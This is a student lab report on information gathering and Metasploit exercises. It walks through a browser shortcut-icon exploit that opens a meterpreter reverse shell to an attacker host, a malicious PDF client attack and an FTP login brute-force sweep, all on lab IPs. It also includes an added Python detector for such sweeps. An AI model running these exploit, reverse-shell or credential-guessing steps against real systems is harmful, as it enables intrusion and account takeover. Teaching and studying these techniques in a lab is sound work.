20155235 "Network Attack and Defense" Experiment 6 Information Collection and Vulnerability Scanning
Experimental content
Application of various search techniques
Query of DNS IP registration information
Basic scanning techniques: host discovery, port scanning, OS and service version detection, enumeration of specific services
Vulnerability scanning: be able to run a scan, read the report, look up vulnerability descriptions, and patch vulnerabilities
Experiment 1. Application of various search techniques
whois
- Use the whois command to query information
The result is shown in the figure
nslookup
- Use
dig -h
to get help
- DNS server query results and cached results of other websites
- Query with the Shodan search engine, get:
- Reverse lookup from IP to domain name, get:
- Query with IP2Location, get:
tracert route detection
- On Windows:
- On Linux:
wonderful difference, emmn... Baidu's address
Experiment 2 Attacks on Browsers
- In the Kali terminal, enter
msfconsole
to open the console.
- Enter
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
to select the browser exploit.
- Enter
set payload windows/meterpreter/reverse_tcp
to select the reverse-connection payload.
- Enter
set SRVHOST 192.168.129.133
to set the server host IP.
- Enter
set LHOST 192.168.129.133
to set the IP of the attacking machine.
- Enter
exploit
which returns the URL
http://192.168.129.133:80/
- On the target machine, visit
http://192.168.129.133:80/
and a window pops up.
- At the same time, the attacking machine receives the connection. Enter
sessions
to view the host that connected back.
- Enter
sessions -i 2
to control the target.
Experiment 3 Attacks on Clients
- Enter
use exploit/windows/fileformat/adobe_cooltype_sing
to choose the attack module.
- Enter
set LHOST 192.168.129.133
to set the IP of the attacking machine.
- Enter
set LPORT 5235
to set the attack port.
- Transfer the generated PDF to the target machine and open it there, and start listening on Kali at the same time.
Experiment 4 Applying an Auxiliary Module
- Enter
show auxiliary
to view all auxiliary modules.
- Use
scanner/http/dir_scanner
to scan directories.
- Select
ftp_login
and scan the five addresses from
192.168.3.44
to
192.168.43.48
using the user name 20151124 (I randomly typed it) and the password 123456.
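From the defender's side, an ftp_login sweep like the one above shows up as one client failing logins on several FTP servers within a short time. The following Python detection check is an added example, not part of the original report; the log layout (a server-name prefix followed by a vsftpd-style line), the server names ftp-a to ftp-c and the thresholds are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: vsftpd-style lines, prefixed with the reporting server
# (the prefix, server names and timestamps are assumptions for this example).
SAMPLE_LOG = """\
ftp-a Mon Apr 23 10:15:01 2018 [pid 2101] [20151124] FAIL LOGIN: Client "192.168.129.133"
ftp-b Mon Apr 23 10:15:02 2018 [pid 1877] [20151124] FAIL LOGIN: Client "192.168.129.133"
ftp-c Mon Apr 23 10:15:03 2018 [pid 3012] [20151124] FAIL LOGIN: Client "192.168.129.133"
ftp-a Mon Apr 23 10:20:40 2018 [pid 2140] [alice] FAIL LOGIN: Client "192.168.43.20"
ftp-a Mon Apr 23 10:20:55 2018 [pid 2141] [alice] OK LOGIN: Client "192.168.43.20"
"""

LINE_RE = re.compile(
    r'^(?P<server>\S+) (?P<ts>\w{3} \w{3} +\d+ [\d:]{8} \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>FAIL|OK) LOGIN: Client "(?P<client>[^"]+)"$'
)

def parse(log_text):
    """Yield (time, server, user, result, client) for each login line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
            yield ts, m["server"], m["user"], m["result"], m["client"]

def find_login_sweeps(log_text, min_servers=3, window=timedelta(minutes=5)):
    """Return {client: sorted servers} for clients whose failed logins hit
    at least min_servers distinct servers inside one time window."""
    failures = defaultdict(list)
    for ts, server, _user, result, client in parse(log_text):
        if result == "FAIL":
            failures[client].append((ts, server))
    flagged = {}
    for client, events in failures.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            servers = {s for t, s in events[i:] if t - start <= window}
            if len(servers) >= min_servers:
                flagged[client] = sorted(servers)
                break
    return flagged

if __name__ == "__main__":
    for client, servers in find_login_sweeps(SAMPLE_LOG).items():
        print(f"{client}: failed FTP logins on {', '.join(servers)}")
```

A single user mistyping a password on one server (the alice lines) stays below the threshold; only the client that fails on three servers within the window is reported.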
Experiment results: Miscalculation! Actually not!
Question
- Explain in your own words what exploit, payload, and encode are.
Exploit means to make use of something: find the vulnerability and use it!
The payload is a carrier that lets us put the virus in and deliver it to other people's computers.
Encode is encryption, used to keep our virus from being detected. The encryption method
Experimental experience
From the fourth test, I had an idea of installing a memory stick. By this experiment, the idea finally took root. I want to install an 8G memory stick!!!!! Otherwise, the virtual machine can't be opened, isn't it funny!